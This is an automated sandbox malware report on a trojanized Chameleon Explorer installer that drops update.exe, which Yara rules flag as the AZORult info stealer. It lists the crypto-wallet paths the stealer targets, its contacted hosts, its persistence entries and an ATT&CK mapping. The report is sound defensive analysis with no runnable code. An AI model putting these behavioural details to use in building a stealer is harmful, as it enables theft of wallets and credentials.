Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Roaming\update.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp

Code function: 7_2_004CCEA4 GetLocalTime,

7_2_004CCEA4

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp

Code function: 7_2_004B0060 GetUserNameW,

7_2_004B0060

Source: C:\Users\user\AppData\Roaming\cexplorer.exe

Code function: 6_2_004110C4 GetModuleHandleW,GetVersion,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDEPPolicy,

6_2_004110C4

Source: ChameleonFolder.exe, 0000000E.00000002.564250543.0000000002706000.00000004.00000040.sdmp	Binary or memory string: \\192.168.2.1\all\procexp.exe
Source: ChameleonFolder.exe, 0000000E.00000002.564250543.0000000002706000.00000004.00000040.sdmp	Binary or memory string: ardz\desktop\procexp.exe

Stealing of Sensitive Information:

Yara detected Azorult Info Stealer

Show sources

Source: Yara match	File source: 8.2.update.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.update.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.update.exe.460000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.update.exe.460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.308603193.0000000000460000.00000004.00000001.sdmp, type: MEMORY

Yara detected Azorult

Show sources

Source: Yara match	File source: 8.2.update.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.update.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.update.exe.460000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.update.exe.460000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.308603193.0000000000460000.00000004.00000001.sdmp, type: MEMORY

Detected AZORult Info Stealer

Show sources

Source: C:\Users\user\AppData\Roaming\update.exe	Code function: 8_2_004186C4		8_2_004186C4
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: 8_2_004186C4		8_2_004186C4

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: update.exe	String found in binary or memory: electrum.dat
Source: update.exe	String found in binary or memory: %appdata%\Electrum\wallets\
Source: update.exe	String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: update.exe	String found in binary or memory: %APPDATA%\Exodus\
Source: update.exe	String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: update.exe	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: update.exe	String found in binary or memory: %APPDATA%\Exodus\
Source: update.exe	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: update.exe	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: update.exe	String found in binary or memory: %appdata%\Electrum-LTC\wallets\

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	DLL Side-Loading1	Exploitation for Privilege Escalation1	Deobfuscate/Decode Files or Information11	Input Capture31	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Native API1	Application Shimming1	DLL Side-Loading1	Obfuscated Files or Information31	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel21	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter12	Scheduled Task/Job1	Application Shimming1	Software Packing131	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Screen Capture1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Scheduled Task/Job1	Registry Run Keys / Startup Folder111	Access Token Manipulation1	DLL Side-Loading1	NTDS	System Information Discovery37	Distributed Component Object Model	Input Capture31	Scheduled Transfer	Application Layer Protocol14	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Process Injection112	Masquerading12	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Scheduled Task/Job1	Virtualization/Sandbox Evasion2	Cached Domain Credentials	Security Software Discovery131	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Registry Run Keys / Startup Folder111	Access Token Manipulation1	DCSync	Virtualization/Sandbox Evasion2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection112	Proc Filesystem	Process Discovery2	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Application Window Discovery11	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	System Owner/User Discovery3	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	Remote System Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	73%	Virustotal		Browse
0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	34%	Metadefender		Browse
0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	68%	ReversingLabs	Win32.Infostealer.Coins
0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	100%	Avira	HEUR/AGEN.1102745

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\update.exe	100%	Avira	HEUR/AGEN.1102745
C:\Users\user\AppData\Roaming\update.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe (copy)	0%	Metadefender		Browse
C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe (copy)	0%	ReversingLabs
C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe (copy)	0%	Metadefender		Browse
C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe (copy)	2%	ReversingLabs
C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe (copy)	0%	Metadefender		Browse
C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe (copy)	0%	ReversingLabs
C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll	3%	ReversingLabs
C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup	3%	ReversingLabs
C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_new (copy)	3%	ReversingLabs
C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll	0%	ReversingLabs
C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_backup	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.0331C7BCA665F36513377FC301CBB32822FF35F925115.exe.3e0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.update.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1108767	Download File
1.0.0331C7BCA665F36513377FC301CBB32822FF35F925115.exe.3e0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.0.update.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1102745	Download File
8.3.update.exe.460000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.3.0331C7BCA665F36513377FC301CBB32822FF35F925115.exe.4937bf8.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
1.2.0331C7BCA665F36513377FC301CBB32822FF35F925115.exe.b3b7fc.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://neosoft-activator.appspot.com/	0%	Avira URL Cloud	safe
http://aia.startssl.com/certs/sca.code2.crt06	0%	Virustotal		Browse
http://aia.startssl.com/certs/sca.code2.crt06	0%	Avira URL Cloud	safe
http://www.chameleon-managers.comc	0%	Avira URL Cloud	safe
https://dotbit.me/a/	0%	URL Reputation	safe
http://www.chameleon-managers.com/subscription/?action=extend&key=	0%	Avira URL Cloud	safe
http://www.chameleon-managers.com3&	0%	Avira URL Cloud	safe
http://www.chameleon-managers.coms	0%	Avira URL Cloud	safe
http://www.chameleon-managers.comQN7	0%	Avira URL Cloud	safe
http://www.chameleon-managers.com/info/versions/	0%	Avira URL Cloud	safe
http://crl.startssl.com/sfsca.crl0f	0%	URL Reputation	safe
http://www.chameleon-managers.comBhttp://www.chameleon-managers.comBhttp://www.chameleon-managers.co	0%	Avira URL Cloud	safe
http://www.chameleon-managers.com/reg.php?program=	0%	Avira URL Cloud	safe
http://finlzzm.com/index.php	0%	Avira URL Cloud	safe
http://www.chameleon-managers.comH	0%	Avira URL Cloud	safe
http://www.chameleon-managers.com3t	0%	Avira URL Cloud	safe
http://www.chameleon-managers.comsK	0%	Avira URL Cloud	safe
http://counter-strike.com.ua/	0%	URL Reputation	safe
http://www.chameleon-managers.com/subscription/?action=latest&key=	0%	Avira URL Cloud	safe
http://www.palkornel.hu/innosetup%1	0%	URL Reputation	safe
http://www.chameleon-managers.com3_lmPlmP	0%	Avira URL Cloud	safe
http://www.chameleon-managers.com	0%	Avira URL Cloud	safe
http://www.innosetup.com/	0%	URL Reputation	safe
http://www.chameleon-managers.com/contacts.php?program=	0%	Avira URL Cloud	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://www.chameleon-managers.com3Y4=A4=AhXInno	0%	Avira URL Cloud	safe
http://crl.startssl.com/sca-code2.crl0#	0%	Avira URL Cloud	safe
http://ocsp.startssl.com07	0%	URL Reputation	safe
http://www.chameleon-managers.com3j	0%	Avira URL Cloud	safe
http://www.chameleon-managers.com3h	0%	Avira URL Cloud	safe
https://2no.co/1AiP77	0%	Avira URL Cloud	safe
http://www.startssl.com/policy0	0%	URL Reputation	safe
http://ocsp.startssl.com00	0%	URL Reputation	safe
http://www.dk-soft.org/	0%	URL Reputation	safe
http://aia.startssl.com/certs/ca.crt0	0%	URL Reputation	safe
http://www.remobjects.com/ps	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
2no.co	5.9.164.117	true	false	high
finlzzm.com	35.205.61.67	true	false	high
ghs.googlehosted.com	142.250.203.115	true	false	high
neosoft-activator.appspot.com	172.217.168.52	true	false	high
www.chameleon-managers.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.chameleon-managers.com/info/versions/	false	Avira URL Cloud: safe	unknown
http://finlzzm.com/index.php	false	Avira URL Cloud: safe	unknown
https://2no.co/1AiP77	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://neosoft-activator.appspot.com/	ChameleonExplorer.exe, 00000009.00000002.342353630.00000000015F1000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, 00000001.00000003.293482923.0000000005310000.00000004.00000001.sdmp, cexplorer.exe, 00000006.00000002.400656816.0000000000401000.00000020.00020000.sdmp	false		high
http://aia.startssl.com/certs/sca.code2.crt06	cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ip-api.com/json	update.exe	false		high
http://www.chameleon-managers.comc	cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://dotbit.me/a/	update.exe	false	URL Reputation: safe	unknown
http://www.chameleon-managers.com/subscription/?action=extend&key=	ChameleonExplorer.exe, 00000009.00000002.338402905.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000C.00000002.348963061.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000F.00000002.381255474.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 00000012.00000000.376549590.0000000000429000.00000020.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.chameleon-managers.com3&	cexplorer.tmp, 00000007.00000003.390562149.000000000337A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.chameleon-managers.coms	cexplorer.exe, 00000006.00000003.399872220.00000000022A6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.chameleon-managers.comQN7	cexplorer.exe, 00000006.00000003.400041300.0000000002374000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.startssl.com/sfsca.crl0f	cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.chameleon-managers.comBhttp://www.chameleon-managers.comBhttp://www.chameleon-managers.co	cexplorer.exe, 00000006.00000003.302777992.0000000002490000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.305051880.0000000003110000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	false		high
http://www.chameleon-managers.com/reg.php?program=	ChameleonExplorer.exe, 00000009.00000002.338402905.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000C.00000002.348963061.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000F.00000002.381255474.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 00000012.00000000.376549590.0000000000429000.00000020.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.chameleon-managers.comH	ChameleonExplorer.exe, 00000009.00000002.338402905.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000C.00000002.348963061.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000F.00000002.381255474.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 00000012.00000000.376549590.0000000000429000.00000020.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.chameleon-managers.com3t	cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.chameleon-managers.comsK	cexplorer.exe, 00000006.00000003.399872220.00000000022A6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://counter-strike.com.ua/	cexplorer.exe, 00000006.00000003.399872220.00000000022A6000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.chameleon-managers.com/subscription/?action=latest&key=	ChameleonExplorer.exe, 00000009.00000002.338402905.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000C.00000002.348963061.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000F.00000002.381255474.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 00000012.00000000.376549590.0000000000429000.00000020.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.palkornel.hu/innosetup%1	cexplorer.exe, 00000006.00000003.399872220.00000000022A6000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.chameleon-managers.com3_lmPlmP	cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.chameleon-managers.com	cexplorer.tmp, 00000007.00000003.305051880.0000000003110000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.391191941.000000000229D000.00000004.00000001.sdmp, ChameleonExplorer.exe, 00000009.00000002.338402905.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000C.00000002.348963061.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000F.00000002.381255474.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 00000012.00000000.376549590.0000000000429000.00000020.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.chameleon-managers.comS	cexplorer.exe, 00000006.00000003.399872220.00000000022A6000.00000004.00000001.sdmp	false		unknown
http://www.innosetup.com/	cexplorer.exe, 00000006.00000003.303106895.000000007FD80000.00000004.00000001.sdmp, cexplorer.tmp, cexplorer.tmp, 00000007.00000000.304413870.0000000000401000.00000020.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.chameleon-managers.com/contacts.php?program=	ChameleonExplorer.exe, 00000009.00000002.338402905.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000C.00000002.348963061.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000F.00000002.381255474.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 00000012.00000000.376549590.0000000000429000.00000020.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.chameleon-managers.com3Y4=A4=AhXInno	cexplorer.exe, 00000006.00000003.399872220.00000000022A6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://crl.startssl.com/sca-code2.crl0#	cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.startssl.com07	cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.chameleon-managers.com3j	cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline	cexplorer.exe	false		high
http://www.chameleon-managers.com3h	cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.startssl.com/policy0	cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.chameleon-managers.com3l	cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	false		unknown
http://ocsp.startssl.com00	cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.chameleon-managers.com/contacts.php?utm_source=program&utm_medium=question&utm_campaign=	ChameleonExplorer.exe, 00000009.00000002.338402905.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000C.00000002.348963061.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000F.00000002.381255474.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 00000012.00000000.376549590.0000000000429000.00000020.00020000.sdmp	false		unknown
http://www.chameleon-managers.com3c	cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	false		unknown
http://www.chameleon-managers.com3f	cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	false		unknown
http://www.chameleon-managers.com3g	cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	false		unknown
http://www.chameleon-managers.com3	cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	false		unknown
http://www.chameleon-managers.com3d	cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	false		unknown
http://www.chameleon-managers.com3e	cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	false		unknown
http://www.dk-soft.org/	cexplorer.exe, 00000006.00000003.399872220.00000000022A6000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.startssl.com/policy0	cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	false		unknown
http://aia.startssl.com/certs/ca.crt0	cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.chameleon-managers.comSQ	cexplorer.exe, 00000006.00000003.399872220.00000000022A6000.00000004.00000001.sdmp	false		unknown
http://www.chameleon-managers.com/0	cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp	false		unknown
http://www.startssl.com/0Q	cexplorer.exe, 00000006.00000003.303218242.000000007FE92000.00000004.00000001.sdmp, cexplorer.tmp, 00000007.00000003.389639916.00000000050D9000.00000004.00000001.sdmp, ChameleonFolder.exe, 0000000D.00000003.361567967.0000000000C91000.00000004.00000001.sdmp, ChameleonExplorer.exe, 0000000F.00000003.380366893.00000000015AE000.00000004.00000001.sdmp	false		unknown
https://neosoft-activator.appspot.com/activation/4/?h_id=75254DF3C66AB052045780D3C643713C-1B3D82FF20	ChameleonExplorer.exe, 00000009.00000002.342353630.00000000015F1000.00000004.00000020.sdmp	false		unknown
http://www.remobjects.com/ps	cexplorer.exe, 00000006.00000003.303106895.000000007FD80000.00000004.00000001.sdmp, cexplorer.tmp	false	URL Reputation: safe	unknown
http://www.chameleon-managers.com3V$mP$mP	cexplorer.tmp, 00000007.00000003.390874816.00000000021A4000.00000004.00000001.sdmp	false		low
https://2no.co/	0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, 00000001.00000002.325491301.00000000048DF000.00000004.00000001.sdmp	false		unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.203.115	ghs.googlehosted.com	United States	15169	GOOGLEUS	false
172.217.168.52	neosoft-activator.appspot.com	United States	15169	GOOGLEUS	false
5.9.164.117	2no.co	Germany	24940	HETZNER-ASDE	false
35.205.61.67	finlzzm.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	527579
Start date:	24.11.2021
Start time:	00:42:09
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	0331C7BCA665F36513377FC301CBB32822FF35F925115.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	37
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.spyw.evad.winEXE@27/42@6/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 43.5% (good quality ratio 40.2%) Quality average: 76.6% Quality standard deviation: 31.2%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:43:18	API Interceptor	2x Sleep call for process: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe modified
00:43:37	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Explorer "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
00:43:39	Task Scheduler	Run new task: Chameleon Folder-user path: "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
00:43:46	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Folder "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
00:43:51	API Interceptor	2x Sleep call for process: ChameleonExplorer.exe modified
00:43:54	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Explorer "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
00:44:02	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chameleon Folder "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

